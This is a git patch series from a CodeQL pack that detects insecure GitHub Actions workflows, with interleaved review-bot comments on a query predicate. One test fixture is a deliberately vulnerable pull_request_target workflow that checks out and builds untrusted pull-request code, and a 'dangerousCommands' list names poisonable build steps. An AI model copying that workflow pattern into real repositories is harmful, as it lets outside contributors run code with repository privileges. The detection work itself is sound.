"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" - }, - "typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true - }, - "undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "requires": { - "@fastify/busboy": "^2.0.0" - } - }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": 
"sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - } -} diff --git a/.github/action/package.json b/.github/action/package.json deleted file mode 100644 index cd9021d20c5e..000000000000 --- a/.github/action/package.json +++ /dev/null 
@@ -1,48 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "description": "CodeQL Pack to analyze GitHub Actions and Workflows", - "main": "dist/index.js", - "scripts": { - "bundle": "npm run format:write && npm run package", - "cli": "ts-node src/index.ts", - "ci-test": "jest", - "format:write": "prettier --write **/*.ts", - "format:check": "prettier --check **/*.ts", - "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml", - "package": "ncc build src/index.ts --license licenses.txt", - "package:watch": "npm run package -- --watch", - "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg", - "all": "npm run format:write && npm run lint && npm run test && npm run package" - }, - "repository": { - "type": "git", - "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git" - }, - "exports": { - ".": "./dist/index.js" - }, - "keywords": [ - "codeql", - "security", - "actions" - ], - "author": "Pwntester", - "license": "MIT", - "bugs": { - "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues" - }, - "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } -} diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts deleted file mode 100644 index 5b06b007d8ae..000000000000 --- a/.github/action/src/codeql.ts +++ /dev/null 
@@ -1,172 +0,0 @@ -import * as fs from "fs"; -import * as path from "path"; - -import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface CodeQLConfig { - // The path to the codeql bundle. - path: string; - // The language to use for analysis. - language: string; - // CodeQL pack to use for analysis. - pack: string; - // The codeql suite to use for analysis. - suite: string; - // The source root to use for analysis. - source_root?: string; - // The output file for the SARIF file. - output?: string; - // Extension CodeQL packs to use for analysis. - packs: string | undefined; -} - -export async function newCodeQL(): Promise { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: - core.getInput("packs").length > 0 ? 
core.getInput("packs") : undefined, - }; -} - -export async function runCommand( - config: CodeQLConfig, - args: string[], - cwd_arg?: string, -): Promise { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd: string = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: CodeQLConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} -async function findCodeQL(): Promise { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} - -async function findCodeQlInToolcache(): Promise { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - - return path.join(candidate.folder, "codeql"); - } - - core.warning(`No CodeQL tools found in toolcache.`); - - return undefined; -} - -export async function downloadPack(codeql: CodeQLConfig): Promise { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} - -export async function codeqlDatabaseCreate( - codeql: CodeQLConfig, -): Promise { - 
// get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = - codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - - return database_path; -} - -export async function codeqlDatabaseAnalyze( - codeql: CodeQLConfig, - database_path: string, -): Promise { - var codeql_output = codeql.output || "codeql-actions.sarif"; - - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - - cmd.push(database_path, suite); - - await runCommand(codeql, cmd); - - return codeql_output; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts deleted file mode 100644 index 53a484ae6c18..000000000000 --- a/.github/action/src/index.ts +++ /dev/null 
@@ -1,61 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as cql from "./codeql"; - -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -export async function run(): Promise { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - - core.debug(`CodeQL CLI found at '${codeql.path}'`); - - await cql.runCommand(codeql, ["version", "--format", "terse"]); - - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); - - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - - core.info("Finished CodeQL analysis"); - } catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) core.setFailed(error.message); - } -} - -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json deleted file mode 100644 index c4b7762f9cd2..000000000000 --- a/.github/action/tsconfig.json +++ /dev/null 
@@ -1,24 +0,0 @@ -{ - "$schema": "https://json.schemastore.org/tsconfig", - "compilerOptions": { - "target": "ES2022", - "module": "NodeNext", - "rootDir": "./src", - "moduleResolution": "NodeNext", - "baseUrl": "./", - "sourceMap": true, - "outDir": "./dist", - "noImplicitAny": true, - "esModuleInterop": true, - "forceConsistentCasingInFileNames": true, - "strict": true, - "skipLibCheck": true, - "newLine": "lf" - }, - "exclude": [ - "./dist", - "./node_modules", - "./__tests__", - "./coverage" - ] -} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml deleted file mode 100644 index 9bc5b787feac..000000000000 --- a/.github/workflows/build.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: Build and Compile Action - -on: - pull_request: - branches: ["master", "develop"] - workflow_dispatch: - -permissions: - contents: read - packages: read - pull-requests: read - -jobs: - action: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: dorny/paths-filter@v3 - id: changes - with: - filters: | - src: - - '.github/action/**' - - 'action.yml' - - - name: Run action - if: steps.changes.outputs.src == 'true' - uses: ./ - with: - token: ${{ secrets.GHCR_TOKEN }} diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml deleted file mode 100644 index a6b568f2bfb2..000000000000 --- a/.github/workflows/copy-to-bughalla.yml +++ /dev/null 
@@ -1,34 +0,0 @@ -name: Copy to Bughalla - -on: - push: - branches: - - 'master' - -permissions: - contents: read - -jobs: - copy: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - - run: | - rm -rf .github/workflows/copy-to-bughalla.yml - git remote set-url --push origin git@github.com:bughalla/codeql-actions - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git add -v . - git commit -m 'Actions: Add patch' - - - name: Push changes - uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a - with: - repository: bughalla/codeql-actions - github_token: ${{ secrets.BUGHALLA_TOKEN }} - branch: ${{ github.ref }} - force: true diff --git a/action.yml b/action.yml deleted file mode 100644 index 151c909fb8be..000000000000 --- a/action.yml +++ /dev/null 
@@ -1,51 +0,0 @@ -name: "codeql-actions" -description: "CodeQL Pack for GitHub Actions and Workflows" - -inputs: - token: - description: GitHub Token - default: ${{ github.token }} - source-root: - description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: ${{ github.workspace }} - sarif-output: - description: "SARIF File Output" - default: "codeql-actions.sarif" - suite: - description: "CodeQL Suite to run" - default: "actions-code-scanning" - packs: - description: >- - Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not - specified, then the latest version of the pack is used. By default, this overrides the same setting in a - configuration file; prefix with "+" to use both sets of packs. - required: false - -runs: - using: 'composite' - steps: - - name: extpack contents - shell: bash - if: inputs.packs - env: - EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 - EXTPACK_NAME: local/workflow-models - run: | - echo "##[group] Workflow Models" - if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi - echo "##[endgroup]" - echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi - echo "##[endgroup]" - - - name: Scan workflows - shell: bash - env: - GITHUB_TOKEN: ${{ inputs.token }} - GH_TOKEN: ${{ inputs.token }} - INPUT_SOURCE-ROOT: ${{ inputs.source-root }} - INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} - INPUT_SUITE: ${{ inputs.suite }} - INPUT_PACKS: ${{ inputs.packs }} - run: | - node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/clean.sh b/clean.sh deleted file mode 100755 index e0458a639e36..000000000000 --- a/clean.sh +++ /dev/null @@ -1,2 +0,0 @@ -#! /bin/bash -find . -type d -name "*testproj*" -exec rm -r {} + From 6df70d1a455f67ce3a174ea0dda7ea9384fec8ad Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 23 Jun 2024 21:34:30 +0200 Subject: [PATCH 343/707] Do not consider priv events if runtime data is available --- ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +++++++--- .../CWE-829/.github/workflows/test3.yml | 41 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + 3 files changed, 58 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index d4864a80e54f..da54833e9a66 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -853,6 +853,14 @@ class JobImpl extends AstNodeImpl, TJobNode {
 this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write")
 }
 
+ private predicate hasRuntimeData() {
+ exists(string path, string trigger, string name, string secrets_source, string perms |
+ workflowDataModel(path, trigger, name, secrets_source, perms, _) and
+ path.trim() = this.getLocation().getFile().getRelativePath() and
+ name.trim().matches(this.getId() + "%")
+ )
+ }
+
 private predicate hasRuntimeWritePermissions() {
 // the effective runtime permissions have write access
 exists(string path, string trigger, string name, string secrets_source, string perms |
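Review bot: The added `name.trim().matches(this.getId() + "%")` in hasRuntimeData is a prefix match, so a runtime-data row for any job whose id merely starts with this job's id (`build` against a row for `build-docs`) satisfies it, and because `matches` treats `_` as a single-character wildcard an id such as `unit_test` also matches a row for `unit-test`. Since the next hunk consumes this as `not this.hasRuntimeData()` to switch off the "normally privileged trigger" fallback, a row belonging to a neighbouring job suppresses a finding for this one, a silent false negative. Unless the `name` column is known to carry a suffix after the id, compare exactly: `name.trim() = this.getId()`; if a suffix is expected, escape the id and anchor on the separator instead. hasRuntimeWritePermissions below appears to follow the same pattern (its body is outside this hunk), so check it together with this one; the enclosing class JobImpl starts before the hunk.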
@@ -885,15 +893,18 @@ class JobImpl extends AstNodeImpl, TJobNode {
 /** Holds if the action is privileged and externally triggerable. */
 predicate isPrivilegedExternallyTriggerable() {
 exists(EventImpl e |
- // job is triggereable by an external user
 this.getATriggerEvent() = e and
+ // job is triggereable by an external user
 e.isExternallyTriggerable() and
- // job is privileged (write access or access to secrets)
+ // no matter if `pull_request` is granted write permissions or access to secrets
+ // when the job is triggered by a `pull_request` event from a fork, they will get revoked
+ not e.getName() = "pull_request" and
 (
- this.isPrivileged() and
- not e.getName() = "pull_request"
+ // job is privileged (write access or access to secrets)
+ this.isPrivileged()
 or
- not this.isPrivileged() and
+ // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise
+ not this.hasRuntimeData() and
 e.isPrivileged()
 )
 )
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
new file mode 100644
index 000000000000..d9aa2973e007
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
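Review bot: The comment re-added as `+ // job is triggereable by an external user` carries the misspelling over from the removed line; since the line is being moved anyway, write `// job is triggerable by an external user`. The two comment lines above `not e.getName() = "pull_request" and` would read better as one statement of the invariant the exclusion relies on, e.g. `// a pull_request run from a fork never receives write permissions or secrets, whatever the workflow declares`. The predicate's closing brace is outside the hunk.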
@@ -0,0 +1,41 @@ +name: "Test" +permissions: + actions: none + checks: none + contents: read + deployments: none + id-token: none + issues: none + discussions: none + packages: none + pages: none + pull-requests: read + repository-projects: none + security-events: none + statuses: none +on: + pull_request_target: + types: + - opened + - edited + - synchronize + +jobs: + main: + name: Test Pull Request + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: npm install + working-directory: scripts/github-actions/semantic-pull-request/ + - name: Lint PR Title + if: github.event_name == 'pull_request_target' + uses: actions/github-script@v7 + with: + script: | + const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request') + await verifyPullRequest({ context, core, github }) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce18..0ff47fd2c53a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -4,5 +4,6 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From b5dfda27fdc7a39e14ff996f034015e4631159a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:24 +0200 Subject: [PATCH 344/707] Add cargo as poisonable step --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f80f09a32d8c..b1d5269d44a3 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,7 +23,7 @@ private string dangerousCommands() { "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run" + "poetry run", "cargo " ] } From 24d69f2ee80f0daab0a9ecbd13867046e61f0b6c Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:35 +0200 Subject: [PATCH 345/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 70edc1b05745..abc56e6a0900 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.2 +version: 0.1.3 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 89df5ee87975..74678b945ca5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.2 +version: 0.1.3 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc8173239e1ba10b9ed2e4f3b5dee76e3854b0cf Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 09:47:43 +0200 Subject: [PATCH 346/707] Move configuration to MaD files --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 74 +++++++++++++++++++ .../actions/config/ConfigExtensions.qll | 41 ++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 45 ----------- .../codeql/actions/dataflow/FlowSources.qll | 3 +- .../internal/ExternalFlowExtensions.qll | 22 ------ .../security/ArtifactPoisoningQuery.qll | 4 +- .../actions/security/CachePoisoningQuery.qll | 2 +- .../actions/security/PoisonableSteps.qll | 62 ++++------------ .../actions/security/SelfHostedQuery.qll | 2 +- .../context_event_map.yml} | 25 +------ .../config/externally_triggereable_events.yml | 18 +++++ ql/lib/ext/config/poisonable_steps.yml | 55 ++++++++++++++ ql/lib/ext/config/workflow_runtime_data.yml | 9 +++ .../8398a7_action-slack.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../akhileshns_heroku-deploy.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../anchore_sbom-action.model.yml | 0 .../anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../{ => manual}/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 .../aszc_change-string-case-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../{ => manual}/azure_powershell.model.yml | 0 .../bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 
.../cachix_cachix-action.model.yml | 0 .../{ => manual}/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../{ => manual}/endbug_latest-tag.model.yml | 0 .../expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../gabrielbb_xvfb-action.model.yml | 0 .../game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../haya14busa_action-cond.model.yml | 0 .../hexlet_project-action.model.yml | 0 .../ilammy_msvc-dev-cmd.model.yml | 0 .../{ => manual}/ilammy_setup-nasm.model.yml | 0 .../{ => manual}/imjohnbo_issue-bot.model.yml | 0 .../iterative_setup-cml.model.yml | 0 .../iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 
.../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../jsdaniell_create-json.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../jwalton_gh-ecr-push.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../magefile_mage-action.model.yml | 0 .../maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../marocchino_on_artifact.model.yml | 0 .../mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../microsoft_setup-msbuild.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../{ => manual}/msys2_setup-msys2.model.yml | 0 .../mxschmitt_action-tmate.model.yml | 0 .../mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../{ => manual}/nanasess_setup-php.model.yml | 0 .../{ => manual}/nick-fields_retry.model.yml | 0 .../octokit_graphql-action.model.yml | 0 .../octokit_request-action.model.yml | 0 .../olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../{ => manual}/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../reggionick_s3-deploy.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../ros-tooling_setup-ros.model.yml | 0 .../{ => 
